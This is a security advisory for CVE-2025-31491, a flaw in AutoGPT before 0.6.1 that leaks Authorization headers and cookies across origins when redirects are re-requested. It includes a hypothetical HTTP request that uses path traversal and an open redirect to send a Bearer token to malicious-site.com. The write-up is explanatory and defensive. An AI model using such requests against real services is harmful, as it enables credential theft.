Overview
The CVE-2025-31491 is a serious vulnerability affecting AutoGPT, a popular platform for automating complex workflows with continuous artificial intelligence agents. This vulnerability allows the leakage of cross-domain cookies and protected headers, which could potentially lead to system compromise or data leakage. It is a severe issue that affects all users of AutoGPT prior to the 0.6.1 version and requires immediate attention due to its high severity score of 8.6 on the Common Vulnerability Scoring System (CVSS).
Given that AutoGPT is widely used for managing AI-driven workflows, this vulnerability could have a significant impact on numerous businesses and organizations. The potential for data leakage raises concerns about the exposure of sensitive information, including authorization credentials and private cookies, which could subsequently be exploited by malicious actors.
Vulnerability Summary
CVE ID: CVE-2025-31491
Severity: High (8.6 CVSS)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: System compromise and potential data leakage
Affected Products
No phone number, email, or personal info required.
Product | Affected Versions
AutoGPT | Prior to 0.6.1
How the Exploit Works
This exploit takes advantage of a design flaw in AutoGPT’s request wrapper around the requests Python library. When a redirect is not followed by the initial request and is re-requested by the wrapper using the new location, security-sensitive headers such as the Authorization and Proxy-Authorization header, and cookies are not accounted for and should not be sent cross-origin. If a malicious actor can coerce the script into visiting a URL with an open redirect vulnerability with the Authorization header, the credentials in the Authorization header will be leaked.
Conceptual Example Code
In this hypothetical example, a malicious actor could exploit the vulnerability by manipulating a script to visit a URL with an open redirect vulnerability. Here’s an example of such a scenario using a GitHub API request:
GET /repos/{owner}/{repo}/issues/comments/{comment_id}/../../../../../redirect/?url=https://malicious-site.com HTTP/1.1
Host: api.github.com
Authorization: Bearer <GitHub_Credentials>In this example, if the GitHub API were to suffer from an open redirect vulnerability, the script could be tricked into visiting the malicious site with the Authorization header, leading to the leakage of GitHub credentials.
Mitigation and Recommendations
All users of AutoGPT are advised to upgrade to version 0.6.1 or later, where this vulnerability has been fixed. In the interim, users can employ a Web Application Firewall (WAF) or an Intrusion Detection System (IDS) as temporary mitigation. Always ensure to follow best practices for secure coding to prevent such vulnerabilities.